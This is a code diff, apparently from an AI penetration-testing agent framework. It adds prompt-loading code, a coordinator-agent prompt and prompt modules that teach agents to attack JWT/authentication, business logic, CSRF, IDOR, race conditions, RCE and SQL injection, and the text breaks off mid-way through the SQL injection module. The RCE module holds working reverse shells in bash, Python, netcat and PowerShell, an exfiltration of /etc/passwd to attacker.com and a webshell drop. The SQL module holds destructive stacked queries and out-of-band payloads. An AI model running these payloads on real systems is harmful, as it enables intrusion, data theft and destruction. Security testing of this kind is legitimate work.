xml_parts.append(f"<parameter={key}>{value}</parameter>")
xml_parts.append("</function>")
return "\n".join(xml_parts)
def clean_content(content: str) -> str:
if not content:
return ""
content = _fix_stopword(content)
tool_pattern = r"<function=[^>]+>.*?</function>"
cleaned = re.sub(tool_pattern, "", content, flags=re.DOTALL)
hidden_xml_patterns = [
r"<inter_agent_message>.*?</inter_agent_message>",
r"<agent_completion_report>.*?</agent_completion_report>",
]
for pattern in hidden_xml_patterns:
cleaned = re.sub(pattern, "", cleaned, flags=re.DOTALL | re.IGNORECASE)
cleaned = re.sub(r"\n\s*\n", "\n\n", cleaned)
return cleaned.strip()

113
strix/prompts/__init__.py Normal file
View File

@@ -0,0 +1,113 @@
from pathlib import Path
from jinja2 import Environment
def get_available_prompt_modules() -> dict[str, list[str]]:
modules_dir = Path(__file__).parent
available_modules = {}
for category_dir in modules_dir.iterdir():
if category_dir.is_dir() and not category_dir.name.startswith("__"):
category_name = category_dir.name
modules = []
for file_path in category_dir.glob("*.jinja"):
module_name = file_path.stem
modules.append(module_name)
if modules:
available_modules[category_name] = sorted(modules)
return available_modules
def get_all_module_names() -> set[str]:
all_modules = set()
for category_modules in get_available_prompt_modules().values():
all_modules.update(category_modules)
return all_modules
def validate_module_names(module_names: list[str]) -> dict[str, list[str]]:
available_modules = get_all_module_names()
valid_modules = []
invalid_modules = []
for module_name in module_names:
if module_name in available_modules:
valid_modules.append(module_name)
else:
invalid_modules.append(module_name)
return {"valid": valid_modules, "invalid": invalid_modules}
def generate_modules_description() -> str:
available_modules = get_available_prompt_modules()
if not available_modules:
return "No prompt modules available"
description_parts = []
for category, modules in available_modules.items():
modules_str = ", ".join(modules)
description_parts.append(f"{category} ({modules_str})")
description = (
f"List of prompt modules to load for this agent (max 3). "
f"Available modules: {', '.join(description_parts)}. "
)
example_modules = []
for modules in available_modules.values():
example_modules.extend(modules[:2])
if len(example_modules) >= 2:
break
if example_modules:
example = f"Example: {example_modules[:2]} for specialized agent"
description += example
return description
def load_prompt_modules(module_names: list[str], jinja_env: Environment) -> dict[str, str]:
import logging
logger = logging.getLogger(__name__)
module_content = {}
prompts_dir = Path(__file__).parent
available_modules = get_available_prompt_modules()
for module_name in module_names:
try:
module_path = None
if "/" in module_name:
module_path = f"{module_name}.jinja"
else:
for category, modules in available_modules.items():
if module_name in modules:
module_path = f"{category}/{module_name}.jinja"
break
if not module_path:
root_candidate = f"{module_name}.jinja"
if (prompts_dir / root_candidate).exists():
module_path = root_candidate
if module_path and (prompts_dir / module_path).exists():
template = jinja_env.get_template(module_path)
var_name = module_name.split("/")[-1]
module_content[var_name] = template.render()
logger.info(f"Loaded prompt module: {module_name} -> {var_name}")
else:
logger.warning(f"Prompt module not found: {module_name}")
except (FileNotFoundError, OSError, ValueError) as e:
logger.warning(f"Failed to load prompt module {module_name}: {e}")
return module_content

View File

@@ -0,0 +1,41 @@
<coordination_role>
You are a COORDINATION AGENT ONLY. You do NOT perform any security testing, vulnerability assessment, or technical work yourself.
Your ONLY responsibilities:
1. Create specialized agents for specific security tasks
2. Monitor agent progress and coordinate between them
3. Compile final scan reports from agent findings
4. Manage agent communication and dependencies
CRITICAL RESTRICTIONS:
- NEVER perform vulnerability testing or security assessments
- NEVER write detailed vulnerability reports (only compile final summaries)
- ONLY use agent_graph and finish tools for coordination
- You can create agents throughout the scan process, depending on the task and findings, not just at the beginning!
</coordination_role>
<agent_management>
BEFORE CREATING AGENTS:
1. Analyze the target scope and break into independent tasks
2. Check existing agents to avoid duplication
3. Create agents with clear, specific objectives to avoid duplication
AGENT TYPES YOU CAN CREATE:
- Reconnaissance: subdomain enum, port scanning, tech identification, etc.
- Vulnerability Testing: SQL injection, XSS, auth bypass, IDOR, RCE, SSRF, etc. Can be black-box or white-box.
- Direct vulnerability testing agents to implement hierarchical workflow (per finding: discover, verify, report, fix): each one should create validation agents for findings verification, which spawn reporting agents for documentation, which create fix agents for remediation
COORDINATION GUIDELINES:
- Ensure clear task boundaries and success criteria
- Terminate redundant agents when objectives overlap
- Use message passing for agent communication
</agent_management>
<final_responsibilities>
When all agents complete:
1. Collect findings from all agents
2. Compile a final scan summary report
3. Use finish tool to complete the assessment
Your value is in orchestration, not execution.
</final_responsibilities>

View File

@@ -0,0 +1,129 @@
<authentication_jwt_guide>
<title>AUTHENTICATION & JWT VULNERABILITIES</title>
<critical>Authentication flaws lead to complete account takeover. JWT misconfigurations are everywhere.</critical>
<jwt_structure>
header.payload.signature
- Header: {"alg":"HS256","typ":"JWT"}
- Payload: {"sub":"1234","name":"John","iat":1516239022}
- Signature: HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
</jwt_structure>
<common_attacks>
<algorithm_confusion>
RS256 to HS256:
- Change RS256 to HS256 in header
- Use public key as HMAC secret
- Sign token with public key (often in /jwks.json or /.well-known/)
</algorithm_confusion>
<none_algorithm>
- Set "alg": "none" in header
- Remove signature completely (keep the trailing dot)
</none_algorithm>
<weak_secrets>
Common secrets: 'secret', 'password', '123456', 'key', 'jwt_secret', 'your-256-bit-secret'
</weak_secrets>
<kid_manipulation>
- SQL Injection: "kid": "key' UNION SELECT 'secret'--"
- Command injection: "kid": "|sleep 10"
- Path traversal: "kid": "../../../../../../dev/null"
</kid_manipulation>
</common_attacks>
<advanced_techniques>
<jwk_injection>
Embed public key in token header:
{"jwk": {"kty": "RSA", "n": "your-public-key-n", "e": "AQAB"}}
</jwk_injection>
<jku_manipulation>
Set jku/x5u to attacker-controlled URL hosting malicious JWKS
</jku_manipulation>
<timing_attacks>
Extract signature byte-by-byte using verification timing differences
</timing_attacks>
</advanced_techniques>
<oauth_vulnerabilities>
<authorization_code_theft>
- Exploit redirect_uri with open redirects, subdomain takeover, parameter pollution
- Missing/predictable state parameter = CSRF
- PKCE downgrade: remove code_challenge parameter
</authorization_code_theft>
</oauth_vulnerabilities>
<saml_attacks>
- Signature exclusion: remove signature element
- Signature wrapping: inject assertions
- XXE in SAML responses
</saml_attacks>
<session_attacks>
- Session fixation: force known session ID
- Session puzzling: mix different session objects
- Race conditions in session generation
</session_attacks>
<password_reset_flaws>
- Predictable tokens: MD5(timestamp), sequential numbers
- Host header injection for reset link poisoning
- Race condition resets
</password_reset_flaws>
<mfa_bypass>
- Response manipulation: change success:false to true
- Status code manipulation: 403 to 200
- Brute force with no rate limiting
- Backup code abuse
</mfa_bypass>
<advanced_bypasses>
<unicode_normalization>
Different representations: admin@exmple.com (fullwidth), аdmin@example.com (Cyrillic)
</unicode_normalization>
<authentication_chaining>
- JWT + SQLi: kid parameter with SQL injection
- OAuth + XSS: steal tokens via XSS
- SAML + XXE + SSRF: chain for internal access
</authentication_chaining>
</advanced_bypasses>
<tools>
- jwt_tool: Comprehensive JWT testing
- Check endpoints: /login, /oauth/authorize, /saml/login, /.well-known/openid-configuration, /jwks.json
</tools>
<validation>
To confirm authentication flaw:
1. Demonstrate account access without credentials
2. Show privilege escalation
3. Prove token forgery works
4. Bypass authentication/2FA requirements
5. Maintain persistent access
</validation>
<false_positives>
NOT a vulnerability if:
- Requires valid credentials
- Only affects own session
- Proper signature validation
- Token expiration enforced
- Rate limiting prevents brute force
</false_positives>
<impact>
- Account takeover: access other users' accounts
- Privilege escalation: user to admin
- Token forgery: create valid tokens
- Bypass mechanisms: skip auth/2FA
- Persistent access: survives logout
</impact>
<remember>Focus on RS256->HS256, weak secrets, and none algorithm first. Modern apps use multiple auth methods simultaneously - find gaps in integration.</remember>
</authentication_jwt_guide>

View File

@@ -0,0 +1,143 @@
<business_logic_flaws_guide>
<title>BUSINESS LOGIC FLAWS - OUTSMARTING THE APPLICATION</title>
<critical>Business logic flaws bypass all technical security controls by exploiting flawed assumptions in application workflow. Often the highest-paying vulnerabilities.</critical>
<discovery_techniques>
- Map complete user journeys and state transitions
- Document developer assumptions
- Find edge cases in workflows
- Look for missing validation steps
- Identify trust boundaries
</discovery_techniques>
<high_value_targets>
<financial_workflows>
- Price manipulation (negative quantities, decimal truncation)
- Currency conversion abuse (buy weak, refund strong)
- Discount/coupon stacking
- Payment method switching after verification
- Cart manipulation during checkout
</financial_workflows>
<account_management>
- Registration race conditions (same email/username)
- Account type elevation
- Trial period extension
- Subscription downgrade with feature retention
</account_management>
<authorization_flaws>
- Function-level bypass (accessing admin functions as user)
- Object reference manipulation
- Permission inheritance bugs
- Multi-tenancy isolation failures
</authorization_flaws>
</high_value_targets>
<exploitation_techniques>
<race_conditions>
Use race conditions to:
- Double-spend vouchers/credits
- Bypass rate limits
- Create duplicate accounts
- Exploit TOCTOU vulnerabilities
</race_conditions>
<state_manipulation>
- Skip workflow steps
- Replay previous states
- Force invalid state transitions
- Manipulate hidden parameters
</state_manipulation>
<input_manipulation>
- Type confusion: string where int expected
- Boundary values: 0, -1, MAX_INT
- Format abuse: scientific notation, Unicode
- Encoding tricks: double encoding, mixed encoding
</input_manipulation>
</exploitation_techniques>
<common_flaws>
<shopping_cart>
- Add items with negative price
- Modify prices client-side
- Apply expired coupons
- Stack incompatible discounts
- Change currency after price lock
</shopping_cart>
<payment_processing>
- Complete order before payment
- Partial payment acceptance
- Payment replay attacks
- Void after delivery
- Refund more than paid
</payment_processing>
<user_lifecycle>
- Premium features in trial
- Account deletion bypasses
- Privilege retention after demotion
- Transfer restrictions bypass
</user_lifecycle>
</common_flaws>
<advanced_techniques>
<business_constraint_violations>
- Exceed account limits
- Bypass geographic restrictions
- Violate temporal constraints
- Break dependency chains
</business_constraint_violations>
<workflow_abuse>
- Parallel execution of exclusive processes
- Recursive operations (infinite loops)
- Asynchronous timing exploitation
- Callback manipulation
</workflow_abuse>
</advanced_techniques>
<validation>
To confirm business logic flaw:
1. Demonstrate financial impact
2. Show consistent reproduction
3. Prove bypass of intended restrictions
4. Document assumption violation
5. Quantify potential damage
</validation>
<false_positives>
NOT a business logic flaw if:
- Requires technical vulnerability (SQLi, XSS)
- Working as designed (bad design ≠ vulnerability)
- Only affects display/UI
- No security impact
- Requires privileged access
</false_positives>
<impact>
- Financial loss (direct monetary impact)
- Unauthorized access to features/data
- Service disruption
- Compliance violations
- Reputation damage
</impact>
<pro_tips>
1. Think like a malicious user, not a developer
2. Question every assumption
3. Test boundary conditions obsessively
4. Combine multiple small issues
5. Focus on money flows
6. Check state machines thoroughly
7. Abuse features, don't break them
8. Document business impact clearly
9. Test integration points
10. Time is often a factor - exploit it
</pro_tips>
<remember>Business logic flaws are about understanding and exploiting the application's rules, not breaking them with technical attacks. The best findings come from deep understanding of the business domain.</remember>
</business_logic_flaws_guide>

View File

@@ -0,0 +1,168 @@
<csrf_vulnerability_guide>
<title>CROSS-SITE REQUEST FORGERY (CSRF) - ADVANCED EXPLOITATION</title>
<critical>CSRF forces authenticated users to execute unwanted actions, exploiting the trust a site has in the user's browser.</critical>
<high_value_targets>
- Password/email change forms
- Money transfer/payment functions
- Account deletion/deactivation
- Permission/role changes
- API key generation/regeneration
- OAuth connection/disconnection
- 2FA enable/disable
- Privacy settings modification
- Admin functions
- File uploads/deletions
</high_value_targets>
<discovery_techniques>
<token_analysis>
Common token names: csrf_token, csrftoken, _csrf, authenticity_token, __RequestVerificationToken, X-CSRF-TOKEN
Check if tokens are:
- Actually validated (remove and test)
- Tied to user session
- Reusable across requests
- Present in GET requests
- Predictable or static
</token_analysis>
<http_methods>
- Test if POST endpoints accept GET
- Try method override headers: _method, X-HTTP-Method-Override
- Check if PUT/DELETE lack protection
</http_methods>
</discovery_techniques>
<exploitation_techniques>
<basic_forms>
HTML form auto-submit:
<form action="https://target.com/transfer" method="POST">
<input name="amount" value="1000">
<input name="to" value="attacker">
</form>
<script>document.forms[0].submit()</script>
</basic_forms>
<json_csrf>
For JSON endpoints:
<form enctype="text/plain" action="https://target.com/api">
<input name='{"amount":1000,"to":"attacker","ignore":"' value='"}'>
</form>
</json_csrf>
<multipart_csrf>
For file uploads:
Use XMLHttpRequest with credentials
Generate multipart/form-data boundaries
</multipart_csrf>
</exploitation_techniques>
<bypass_techniques>
<token_bypasses>
- Null token: remove parameter entirely
- Empty token: csrf_token=
- Token from own account: use your valid token
- Token fixation: force known token value
- Method interchange: GET token used for POST
</token_bypasses>
<header_bypasses>
- Referer bypass: use data: URI, about:blank
- Origin bypass: null origin via sandboxed iframe
- CORS misconfigurations
</header_bypasses>
<content_type_tricks>
- Change multipart to application/x-www-form-urlencoded
- Use text/plain for JSON endpoints
- Exploit parsers that accept multiple formats
</content_type_tricks>
</bypass_techniques>
<advanced_techniques>
<subdomain_csrf>
- XSS on subdomain = CSRF on main domain
- Cookie scope abuse (domain=.example.com)
- Subdomain takeover for CSRF
</subdomain_csrf>
<csrf_login>
- Force victim to login as attacker
- Plant backdoors in victim's account
- Access victim's future data
</csrf_login>
<csrf_logout>
- Force logout → login CSRF → account takeover
</csrf_logout>
<double_submit_csrf>
If using double-submit cookies:
- Set cookie via XSS/subdomain
- Cookie injection via header injection
- Cookie tossing attacks
</double_submit_csrf>
</advanced_techniques>
<special_contexts>
<websocket_csrf>
- Cross-origin WebSocket hijacking
- Steal tokens from WebSocket messages
</websocket_csrf>
<graphql_csrf>
- GET requests with query parameter
- Batched mutations
- Subscription abuse
</graphql_csrf>
<api_csrf>
- Bearer tokens in URL parameters
- API keys in GET requests
- Insecure CORS policies
</api_csrf>
</special_contexts>
<validation>
To confirm CSRF:
1. Create working proof-of-concept
2. Test across browsers
3. Verify action completes successfully
4. No user interaction required (beyond visiting page)
5. Works with active session
</validation>
<false_positives>
NOT CSRF if:
- Requires valid CSRF token
- SameSite cookies properly configured
- Proper origin/referer validation
- User interaction required
- Only affects non-sensitive actions
</false_positives>
<impact>
- Account takeover
- Financial loss
- Data modification/deletion
- Privilege escalation
- Privacy violations
</impact>
<pro_tips>
1. Check all state-changing operations
2. Test file upload endpoints
3. Look for token disclosure in URLs
4. Chain with XSS for token theft
5. Check mobile API endpoints
6. Test CORS configurations
7. Verify SameSite cookie settings
8. Look for method override possibilities
9. Test WebSocket endpoints
10. Document clear attack scenario
</pro_tips>
<remember>Modern CSRF requires creativity - look for token leaks, chain with other vulnerabilities, and focus on high-impact actions. SameSite cookies are not always properly configured.</remember>
</csrf_vulnerability_guide>

View File

@@ -0,0 +1,164 @@
<idor_vulnerability_guide>
<title>INSECURE DIRECT OBJECT REFERENCE (IDOR) - ELITE TECHNIQUES</title>
<critical>IDORs are among the HIGHEST IMPACT vulnerabilities - direct unauthorized data access and account takeover.</critical>
<discovery_techniques>
<parameter_analysis>
- Numeric IDs: user_id=123, account=456
- UUID/GUID patterns: id=550e8400-e29b-41d4-a716-446655440000
- Encoded IDs: Base64, hex, custom encoding
- Composite IDs: user-org-123-456, ACCT:2024:00123
- Hash-based IDs: Check if predictable (MD5 of sequential numbers)
- Object references in: URLs, POST bodies, headers, cookies, JWT tokens
</parameter_analysis>
<advanced_enumeration>
- Boundary values: 0, -1, null, empty string, max int
- Different formats: {"id":123} vs {"id":"123"}
- ID patterns: increment, decrement, similar patterns
- Wildcard testing: *, %, _, all
- Array notation: id[]=123&id[]=456
</advanced_enumeration>
</discovery_techniques>
<high_value_targets>
- User profiles and PII
- Financial records/transactions
- Private messages/communications
- Medical records
- API keys/secrets
- Internal documents
- Admin functions
- Export endpoints
- Backup files
- Debug information
</high_value_targets>
<exploitation_techniques>
<direct_access>
Simple increment/decrement:
/api/user/123 → /api/user/124
/download?file=report_2024_01.pdf → report_2024_02.pdf
</direct_access>
<mass_enumeration>
Automate ID ranges:
for i in range(1, 10000):
/api/user/{i}/data
</mass_enumeration>
<type_confusion>
- String where int expected: "123" vs 123
- Array where single value expected: [123] vs 123
- Object injection: {"id": {"$ne": null}}
</type_confusion>
</exploitation_techniques>
<advanced_techniques>
<uuid_prediction>
- Time-based UUIDs (version 1): predictable timestamps
- Weak randomness in version 4
- Sequential UUID generation
</uuid_prediction>
<blind_idor>
- Side channel: response time, size differences
- Error message variations
- Boolean-based: exists vs not exists
</blind_idor>
<secondary_idor>
First get list of IDs, then access:
/api/users → [123, 456, 789]
/api/user/789/private-data
</secondary_idor>
</advanced_techniques>
<bypass_techniques>
<parameter_pollution>
?id=123&id=456 (takes last or first?)
?user_id=victim&user_id=attacker
</parameter_pollution>
<encoding_tricks>
- URL encode: %31%32%33
- Double encoding: %25%33%31
- Unicode: \u0031\u0032\u0033
</encoding_tricks>
<case_variation>
userId vs userid vs USERID vs UserId
</case_variation>
<format_switching>
/api/user.json?id=123
/api/user.xml?id=123
/api/user/123.json vs /api/user/123
</format_switching>
</bypass_techniques>
<special_contexts>
<graphql_idor>
Query batching and alias abuse:
query { u1: user(id: 123) { data } u2: user(id: 456) { data } }
</graphql_idor>
<websocket_idor>
Subscribe to other users' channels:
{"subscribe": "user_456_notifications"}
</websocket_idor>
<file_path_idor>
../../../other_user/private.pdf
/files/user_123/../../user_456/data.csv
</file_path_idor>
</special_contexts>
<chaining_attacks>
- IDOR + XSS: Access and weaponize other users' data
- IDOR + CSRF: Force actions on discovered objects
- IDOR + SQLi: Extract all IDs then access
</chaining_attacks>
<validation>
To confirm IDOR:
1. Access data/function without authorization
2. Demonstrate data belongs to another user
3. Show consistent access pattern
4. Prove it's not intended functionality
5. Document security impact
</validation>
<false_positives>
NOT IDOR if:
- Public data by design
- Proper authorization checks
- Only affects own resources
- Rate limiting prevents exploitation
- Data is sanitized/limited
</false_positives>
<impact>
- Personal data exposure
- Financial information theft
- Account takeover
- Business data leak
- Compliance violations (GDPR, HIPAA)
</impact>
<pro_tips>
1. Test all ID parameters systematically
2. Look for patterns in IDs
3. Check export/download functions
4. Test different HTTP methods
5. Monitor for blind IDOR via timing
6. Check mobile APIs separately
7. Look for backup/debug endpoints
8. Test file path traversal
9. Automate enumeration carefully
10. Chain with other vulnerabilities
</pro_tips>
<remember>IDORs are about broken access control, not just guessable IDs. Even GUIDs can be vulnerable if disclosed elsewhere. Focus on high-impact data access.</remember>
</idor_vulnerability_guide>

View File

@@ -0,0 +1,194 @@
<race_conditions_guide>
<title>RACE CONDITIONS - TIME-OF-CHECK TIME-OF-USE (TOCTOU) MASTERY</title>
<critical>Race conditions lead to financial fraud, privilege escalation, and business logic bypass. Often overlooked but devastating.</critical>
<high_value_targets>
- Payment/checkout processes
- Coupon/discount redemption
- Account balance operations
- Voting/rating systems
- Limited resource allocation
- User registration (username claims)
- Password reset flows
- File upload/processing
- API rate limits
- Loyalty points/rewards
- Stock/inventory management
- Withdrawal functions
</high_value_targets>
<discovery_techniques>
<identify_race_windows>
Multi-step processes with gaps between:
1. Check phase (validation/verification)
2. Use phase (action execution)
3. Write phase (state update)
Look for:
- "Check balance then deduct"
- "Verify coupon then apply"
- "Check inventory then purchase"
- "Validate token then consume"
</identify_race_windows>
<detection_methods>
- Parallel requests with same data
- Rapid sequential requests
- Monitor for inconsistent states
- Database transaction analysis
- Response timing variations
</detection_methods>
</discovery_techniques>
<exploitation_tools>
<turbo_intruder>
Python script for Burp Suite Turbo Intruder:
```python
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=False)
for i in range(30):
engine.queue(target.req, gate='race1')
engine.openGate('race1')
```
</turbo_intruder>
<manual_methods>
- Browser developer tools (multiple tabs)
- curl with & for background: curl url & curl url &
- Python asyncio/aiohttp
- Go routines
- Node.js Promise.all()
</manual_methods>
</exploitation_tools>
<common_vulnerabilities>
<financial_races>
- Double withdrawal
- Multiple discount applications
- Balance transfer duplication
- Payment bypass
- Cashback multiplication
</financial_races>
<authentication_races>
- Multiple password resets
- Account creation with same email
- 2FA bypass
- Session generation collision
</authentication_races>
<resource_races>
- Inventory depletion bypass
- Rate limit circumvention
- File overwrite
- Token reuse
</resource_races>
</common_vulnerabilities>
<advanced_techniques>
<single_packet_attack>
HTTP/2 multiplexing for true simultaneous delivery:
- All requests in single TCP packet
- Microsecond precision
- Bypass even mutex locks
</single_packet_attack>
<last_byte_sync>
Send all but last byte, then:
1. Hold connections open
2. Send final byte simultaneously
3. Achieve nanosecond precision
</last_byte_sync>
<connection_warming>
Pre-establish connections:
1. Create connection pool
2. Prime with dummy requests
3. Send race requests on warm connections
</connection_warming>
</advanced_techniques>
<bypass_techniques>
<distributed_attacks>
- Multiple source IPs
- Different user sessions
- Varied request headers
- Geographic distribution
</distributed_attacks>
<timing_optimization>
- Measure server processing time
- Align requests with server load
- Exploit maintenance windows
- Target async operations
</timing_optimization>
</bypass_techniques>
<specific_scenarios>
<limit_bypass>
"Limited to 1 per user" → Send N parallel requests
Results: N successful purchases
</limit_bypass>
<balance_manipulation>
Transfer $100 from account with $100 balance:
- 10 parallel transfers
- Each checks balance: $100 available
- All proceed: -$900 balance
</balance_manipulation>
<vote_manipulation>
Single vote limit:
- Send multiple vote requests simultaneously
- All pass validation
- Multiple votes counted
</vote_manipulation>
</specific_scenarios>
<validation>
To confirm race condition:
1. Demonstrate parallel execution success
2. Show single request fails
3. Prove timing dependency
4. Document financial/security impact
5. Achieve consistent reproduction
</validation>
<false_positives>
NOT a race condition if:
- Idempotent operations
- Proper locking mechanisms
- Atomic database operations
- Queue-based processing
- No security impact
</false_positives>
<impact>
- Financial loss (double spending)
- Resource exhaustion
- Data corruption
- Business logic bypass
- Privilege escalation
</impact>
<pro_tips>
1. Use HTTP/2 for better synchronization
2. Automate with Turbo Intruder
3. Test payment flows extensively
4. Monitor database locks
5. Try different concurrency levels
6. Test async operations
7. Look for compensating transactions
8. Check mobile app endpoints
9. Test during high load
10. Document exact timing windows
</pro_tips>
<remember>Modern race conditions require microsecond precision. Focus on financial operations and limited resource allocation. Single-packet attacks are most reliable.</remember>
</race_conditions_guide>

View File

@@ -0,0 +1,222 @@
<rce_vulnerability_guide>
<title>REMOTE CODE EXECUTION (RCE) - MASTER EXPLOITATION</title>
<critical>RCE is the holy grail - complete system compromise. Modern RCE requires sophisticated bypass techniques.</critical>
<common_injection_contexts>
- System commands: ping, nslookup, traceroute, whois
- File operations: upload, download, convert, resize
- PDF generators: wkhtmltopdf, phantomjs
- Image processors: ImageMagick, GraphicsMagick
- Media converters: ffmpeg, sox
- Archive handlers: tar, zip, 7z
- Version control: git, svn operations
- LDAP queries
- Database backup/restore
- Email sending functions
</common_injection_contexts>
<detection_methods>
<time_based>
- Linux/Unix: ;sleep 10 # | sleep 10 # `sleep 10` $(sleep 10)
- Windows: & ping -n 10 127.0.0.1 & || ping -n 10 127.0.0.1 ||
- PowerShell: ;Start-Sleep -s 10 #
</time_based>
<dns_oob>
- nslookup $(whoami).attacker.com
- ping $(hostname).attacker.com
- curl http://$(cat /etc/passwd | base64).attacker.com
</dns_oob>
<output_based>
- Direct: ;cat /etc/passwd
- Encoded: ;cat /etc/passwd | base64
- Hex: ;xxd -p /etc/passwd
</output_based>
</detection_methods>
<command_injection_vectors>
<basic_payloads>
; id
| id
|| id
& id
&& id
`id`
$(id)
${IFS}id
</basic_payloads>
<bypass_techniques>
- Space bypass: ${IFS}, $IFS$9, <, %09 (tab)
- Blacklist bypass: w'h'o'a'm'i, w"h"o"a"m"i
- Command substitution: $(a=c;b=at;$a$b /etc/passwd)
- Encoding: echo 'aWQ=' | base64 -d | sh
- Case variation: WhOaMi (Windows)
</bypass_techniques>
</command_injection_vectors>
<language_specific_rce>
<php>
- eval($_GET['cmd'])
- system(), exec(), shell_exec(), passthru()
- preg_replace with /e modifier
- assert() with string input
- unserialize() exploitation
</php>
<python>
- eval(), exec()
- subprocess.call(shell=True)
- os.system()
- pickle deserialization
- yaml.load()
</python>
<java>
- Runtime.getRuntime().exec()
- ProcessBuilder
- ScriptEngine eval
- JNDI injection
- Expression Language injection
</java>
<nodejs>
- eval()
- child_process.exec()
- vm.runInContext()
- require() pollution
</nodejs>
</language_specific_rce>
<advanced_exploitation>
<polyglot_payloads>
Works in multiple contexts:
;id;#' |id| #" |id| #
${{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}
</polyglot_payloads>
<blind_rce>
- DNS exfiltration: $(whoami).evil.com
- HTTP callbacks: curl evil.com/$(id)
- Time delays for boolean extraction
- Write to web root: echo '<?php system($_GET["cmd"]); ?>' > /var/www/shell.php
</blind_rce>
<chained_exploitation>
1. Command injection → Write webshell
2. File upload → LFI → RCE
3. XXE → SSRF → internal RCE
4. SQLi → INTO OUTFILE → RCE
</chained_exploitation>
</advanced_exploitation>
<specific_contexts>
<imagemagick>
push graphic-context
viewbox 0 0 640 480
fill 'url(https://evil.com/image.jpg"|id > /tmp/output")'
pop graphic-context
</imagemagick>
<ghostscript>
%!PS
/outfile (%pipe%id) (w) file def
</ghostscript>
<ffmpeg>
#EXTM3U
#EXT-X-TARGETDURATION:1
#EXTINF:1.0,
concat:|file:///etc/passwd
</ffmpeg>
<latex>
\immediate\write18{id > /tmp/pwn}
\input{|"cat /etc/passwd"}
</latex>
</specific_contexts>
<container_escapes>
<docker>
- Privileged containers: mount host filesystem
- Docker.sock exposure
- Kernel exploits
- /proc/self/exe overwrite
</docker>
<kubernetes>
- Service account tokens
- Kubelet API access
- Container breakout to node
</kubernetes>
</container_escapes>
<waf_bypasses>
- Unicode normalization
- Double URL encoding
- Case variation mixing
- Null bytes: %00
- Comments: /**/i/**/d
- Alternative commands: hostname vs uname -n
- Path traversal: /usr/bin/id vs id
</waf_bypasses>
<post_exploitation>
<reverse_shells>
Bash: bash -i >& /dev/tcp/attacker/4444 0>&1
Python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Netcat: nc -e /bin/sh attacker 4444
PowerShell: $client = New-Object System.Net.Sockets.TCPClient("attacker",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
</reverse_shells>
<persistence>
- Cron jobs
- SSH keys
- Web shells
- Systemd services
</persistence>
</post_exploitation>
<validation>
To confirm RCE:
1. Execute unique command (id, hostname)
2. Demonstrate file system access
3. Show command output retrieval
4. Achieve reverse shell
5. Prove consistent execution
</validation>
<false_positives>
NOT RCE if:
- Only crashes application
- Limited to specific commands
- Sandboxed/containerized properly
- No actual command execution
- Output not retrievable
</false_positives>
<impact>
- Complete system compromise
- Data exfiltration
- Lateral movement
- Backdoor installation
- Service disruption
</impact>
<pro_tips>
1. Try all delimiters: ; | || & &&
2. Test both Unix and Windows commands
3. Use time-based for blind confirmation
4. Chain with other vulnerabilities
5. Check sudo permissions post-exploit
6. Look for SUID binaries
7. Test command substitution variants
8. Monitor DNS for blind RCE
9. Try polyglot payloads first
10. Document full exploitation path
</pro_tips>
<remember>Modern RCE often requires chaining vulnerabilities and bypassing filters. Focus on blind techniques, WAF bypasses, and achieving stable shells. Always test in the specific context - ImageMagick RCE differs from command injection.</remember>
</rce_vulnerability_guide>

View File

@@ -0,0 +1,216 @@
<sql_injection_guide>
<title>SQL INJECTION - MASTER CLASS TECHNIQUES</title>
<critical>SQL Injection = direct database access = game over.</critical>
<injection_points>
- URL parameters: ?id=1
- POST body parameters
- HTTP headers: User-Agent, Referer, X-Forwarded-For
- Cookie values
- JSON/XML payloads
- File upload names
- Session identifiers
</injection_points>
<detection_techniques>
- Time-based: ' AND SLEEP(5)--
- Boolean-based: ' AND '1'='1 vs ' AND '1'='2
- Error-based: ' (provoke verbose errors)
- Out-of-band: DNS/HTTP callbacks
- Differential response: content length changes
- Second-order: stored and triggered later
</detection_techniques>
<uncommon_contexts>
- ORDER BY: (CASE WHEN condition THEN 1 ELSE 2 END)
- GROUP BY: GROUP BY id HAVING 1=1--
- INSERT: INSERT INTO users VALUES (1,'admin',(SELECT password FROM admins))--
- UPDATE: UPDATE users SET email=(SELECT @@version) WHERE id=1
- Functions: WHERE MATCH(title) AGAINST((SELECT password FROM users LIMIT 1))
</uncommon_contexts>
<basic_payloads>
<union_based>
' UNION SELECT null--
' UNION SELECT null,null--
' UNION SELECT 1,2,3--
' UNION SELECT 1,@@version,3--
' UNION ALL SELECT 1,database(),3--
</union_based>
<error_based>
' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))--
' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)--
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
</error_based>
<blind_boolean>
' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--
' AND ASCII(SUBSTRING((SELECT database()),1,1))>97--
' AND (SELECT COUNT(*) FROM users)>5--
</blind_boolean>
<blind_time>
' AND IF(1=1,SLEEP(5),0)--
' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--
'; WAITFOR DELAY '0:0:5'-- (MSSQL)
'; SELECT pg_sleep(5)-- (PostgreSQL)
</blind_time>
</basic_payloads>
<advanced_techniques>
<stacked_queries>
'; DROP TABLE users--
'; INSERT INTO admins VALUES ('hacker','password')--
'; UPDATE users SET password='hacked' WHERE username='admin'--
</stacked_queries>
<out_of_band>
MySQL:
' AND LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\a'))--
' UNION SELECT LOAD_FILE('/etc/passwd')--
MSSQL:
'; EXEC xp_dirtree '\\attacker.com\share'--
